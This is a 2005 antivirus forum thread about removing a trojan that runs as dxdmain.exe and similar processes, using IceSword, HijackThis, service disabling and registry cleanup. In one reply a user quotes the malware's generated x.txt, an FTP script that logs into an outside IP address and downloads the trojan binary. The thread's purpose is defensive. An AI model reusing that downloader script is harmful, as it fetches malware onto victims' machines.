【分享】关于中了xxx.exe,dxdmain.exe朋友进来看看 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛【分享】关于中了xxx.exe,dxdmain.exe朋友进来看看

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

【分享】关于中了xxx.exe,dxdmain.exe朋友进来看看

花落花又开社区嘉宾帖子:6782 注册: 2005-04-16 来自:	发表于： 2005-07-29 13:50 \| 只看楼主短消息资料字号：小中大 1楼【分享】关于中了xxx.exe,dxdmain.exe朋友进来看看近日，不少朋友机器进程多了类似ddd.exe,vvv.exe,dxdmain.exe不明进程，很显然，是木马或病毒的进程，但是怎么杀呢？本文来介绍下。 1.dxdmain.exe在WINDOWS模式下不能直接删除，因为有病毒进程保护着它老人家，可以结束它的进程xxx.exe 删除，清理注册表。此为方法1 2.借助一个小工具 “hijackthis”（附件中有）首先用IceSword结束其进程：使用hijackthis扫描: 023项：O23 - Service: DirectX Graphics (dxdmain) - Unknown owner - C:\WINNT\system32\uuu.exe修复. 删除文件C:\WINNT\system32\uuu.exe 停止其服务：开始--控制面版--管理工具--服务--找到“DirectX Graphics”属性--改成“已禁用” 删除其注册表键: 操作完以上步骤，病毒就被扫地出门了。附件: 文件名:4842302005729142750.rar 下载次数:44 文件类型:application/octet-stream 文件大小: 上传时间:2005-7-29 13:50:39 描述: 2005-07-29 18:10:30
花落花又开社区嘉宾帖子:6782 注册: 2005-04-16 来自:	分享到：

我是一只小小虾初生襁褓狮帖子:2 注册: 2005-07-29 来自:	发表于： 2005-07-29 13:55 \| 短消息资料字号：小中大 2楼太好啦...谢谢你
我是一只小小虾初生襁褓狮帖子:2 注册: 2005-07-29 来自:

感覺初生襁褓狮帖子:129 注册: 2005-07-20 来自:	发表于： 2005-07-29 14:09 \| 短消息资料字号：小中大 3楼感谢楼主分享拉,学习.
感覺初生襁褓狮帖子:129 注册: 2005-07-20 来自:

昵称1860 初生襁褓狮帖子:2 注册: 2005-07-29 来自:	发表于： 2005-07-29 14:19 \| 短消息资料字号：小中大 4楼是不是楼主自己作的病毒啊，连。。。。。。都杀不了。。。
昵称1860 初生襁褓狮帖子:2 注册: 2005-07-29 来自:

不言放弃社区嘉宾帖子:30678 注册: 2004-09-17 来自:蓝色星球	发表于： 2005-07-29 14:26 \| 短消息资料字号：小中大 5楼安全模式下操作一下就可以了谢谢楼主分享
不言放弃社区嘉宾帖子:30678 注册: 2004-09-17 来自:蓝色星球

社区嘉宾

帖子:6782
注册: 2005-04-16
来自:

发表于： 2005-07-29 14:39 | 只看楼主 短消息资料

字号：小中大 6楼

引用:

【不言放弃的贴子】安全模式下操作一下就可以了

谢谢楼主分享
...........................

这里只是说个病毒清除思路而已,仅供大家参考.

gototop

lyon23 初生襁褓狮帖子:13 注册: 2005-07-29 来自:	发表于： 2005-07-29 16:50 \| 短消息资料字号：小中大 7楼 [img][/img] 删不玩，删不完！还有，哈哈哈哈哈而且自动生成一个“x.txt”内容如下：open 218.86.1.14 21920 user xslu xslu get dxdmain.exe quit
lyon23 初生襁褓狮帖子:13 注册: 2005-07-29 来自:

花落花又开社区嘉宾帖子:6782 注册: 2005-04-16 来自:	发表于： 2005-07-29 17:00 \| 只看楼主短消息资料字号：小中大 8楼【回复“lyon23”的帖子】马甲吧?捣乱吗?
花落花又开社区嘉宾帖子:6782 注册: 2005-04-16 来自:

花落花又开社区嘉宾帖子:6782 注册: 2005-04-16 来自:	发表于： 2005-07-29 17:02 \| 只看楼主短消息资料字号：小中大 9楼 sorry,我这个样本没找到x.txt,麻烦您看好了自己的情况分析咯. 附件: 文件名:4842302005729170253.JPG 下载次数:0 文件类型:image/pjpeg 文件大小: 上传时间:2005-7-29 17:02:53 描述:
花落花又开社区嘉宾帖子:6782 注册: 2005-04-16 来自:

lyon23 初生襁褓狮帖子:13 注册: 2005-07-29 来自:	发表于： 2005-07-29 17:15 \| 短消息资料字号：小中大 10楼谁有兴趣和你捣啊！删了，后自动跳出来的DXDMAIN 和x.txt，2玩意在一起。现在我的x.txt也没有了，DXDMAIN 却还有——IceSword结束其进程，马上又出现~~~~ 至于你的“hijackthis”，就没顶上用场。然后啊，fff.exe \ qqq.exe\ uuu.exe === 一共件到5、6个。好病毒啊，DDDDD~~~~~~~~~~~~~~~~~
lyon23 初生襁褓狮帖子:13 注册: 2005-07-29 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT